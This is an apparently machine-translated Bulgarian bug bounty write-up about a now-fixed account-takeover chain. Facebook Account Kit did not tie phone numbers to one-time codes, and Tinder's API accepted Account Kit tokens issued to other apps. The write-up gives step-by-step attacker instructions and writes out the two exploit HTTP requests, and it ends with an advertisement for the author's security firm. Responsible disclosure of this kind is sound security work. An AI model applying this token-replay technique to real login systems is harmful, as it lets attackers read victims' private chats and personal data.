Как хакнах акаунти в Tinder, използвайки акаунта на Facebook, и спечелих $ 6 250 на награди

Това се публикува с разрешението на Facebook съгласно политиката за отговорно разкриване.

Уязвимостите, споменати в тази публикация в блога, бяха бързо отстранени от инженерните екипи на Facebook и Tinder.

Тази публикация е за уязвимост при поглъщане на акаунт, която открих в приложението на Tinder. Използвайки това, нападателят би могъл да получи достъп до акаунта на Tinder на жертвата, който трябва да е използвал телефонния си номер за влизане.

Това би могло да бъде използвано чрез уязвимост в акаунта на Facebook, който Facebook наскоро адресира.

Както уеб, така и мобилните приложения на Tinder позволяват на потребителите да използват своите номера на мобилни телефони, за да влязат в услугата. И тази услуга за вход се предоставя от Account Kit (Facebook).

Потребителят щраква върху Вход с телефонен номер на tinder.com и след това се пренасочва към Accountkit.com за влизане. Ако удостоверяването е успешно, тогава Account Kit предава маркера за достъп на Tinder за влизане.

Интересното е, че API на Tinder не проверява идентификатора на клиента в маркера, предоставен от Account Kit.

Това позволи на атакуващия да използва токен за достъп на друго приложение, предоставен от Account Kit, за да поеме реалните Tinder акаунти на други потребители.

Описание на уязвимостта

Account Kit е продукт на Facebook, който позволява на хората бързо да се регистрират и да влязат в някои регистрирани приложения, като използват само техните телефонни номера или имейл адреси, без да се нуждаят от парола. Той е надежден, лесен за използване и дава на потребителя избор за това как иска да се регистрира за приложения.

Tinder е мобилно приложение, базирано на местоположение за търсене и среща с нови хора. Позволява на потребителите да харесват или не харесват други потребители и след това да продължат към чат, ако двете страни са прекарали пръст надясно.

Имаше уязвимост в Account Kit, чрез която нападателят можеше да получи достъп до акаунта на акаунта на всеки потребител само с помощта на техния телефонен номер. Веднъж влязъл, нападателят би могъл да се запознае с маркера за достъп на потребителския комплект за акаунт, присъстващ в техните бисквитки (aks).

След това нападателят може да използва маркера за достъп (aks), за да влезе в акаунта на потребителя в Tinder, използвайки уязвим API.

Как експлойтът ми работеше стъпка по стъпка

Етап 1

Първо нападателят ще влезе в акаунта на акаунта на жертвата, като въведе телефонния номер на жертвата в “ new_phone_number ” в заявката за API, показана по-долу.

Моля, обърнете внимание, че Account Kit не проверява картографирането на телефонните номера с еднократната им парола. Нападателят може да въведе телефонния номер на всеки и след това просто да влезе в акаунта на акаунта на жертвата.

Тогава нападателят може да копира от бисквитките маркера за достъп „aks“ на жертвата на приложението Account Kit.

API за уязвимия акаунт:

POST / update / async / phone / confirm /? Dpr = 2 HTTP / 1.1 Хост: www.accountkit.com new_phone_number = [телефонен номер на vctim] & update_request_code = c1fb2e919bb33a076a7c6fe4a9fbfa97 [код на заявката на атакуващ] & ____________________________________________________ 1 & __ dyn = & __ req = 6 & __ be = -1 & __ pc = FAZED% 3ADEFAULT & __ rev = 3496767 & fb_dtsg = & jazoest =

Стъпка 2

Сега нападателят просто преиграва следната заявка, като използва копирания маркер за достъп „aks“ на жертвата в API на Tinder по-долу.

Те ще бъдат влезли в акаунта на Tinder на жертвата. Тогава нападателят щеше да има пълен контрол над акаунта на жертвата. Те можеха да четат частни чатове, пълна лична информация и да плъзгат профилите на други потребители наляво или надясно, наред с други неща.

API за уязвим Tinder:

POST / v2 / auth / login / accountkit? Locale = bg HTTP / 1.1

Водещ: api.gotinder.com

Връзка: близо

Дължина на съдържанието: 185

Произход: //tinder.com

версия на приложението: 1000000

платформа: уеб

Потребителски агент: Mozilla / 5.0 (Macintosh)

тип съдържание: application / json

Приемете: * / *

Референт: //tinder.com/

Приемане-кодиране: gzip, дефлация

Език на приемане: en-US, en; q = 0.9

{“Token”: ”xxx”, ”id”: ””}

Видео доказателство за концепцията

Хронология

И двете уязвимости бяха отстранени бързо от Tinder и Facebook. Facebook ме награди с 5000 щатски долара, а Tinder ме награди с 1250 долара.

Аз съм основател на AppSecure, специализирана компания за киберсигурност с дългогодишни умения и щателен опит. Ние сме тук, за да защитим вашия бизнес и критични данни от онлайн и офлайн заплахи или уязвимости.

Можете да се свържете с нас на [email protected] или [email protected]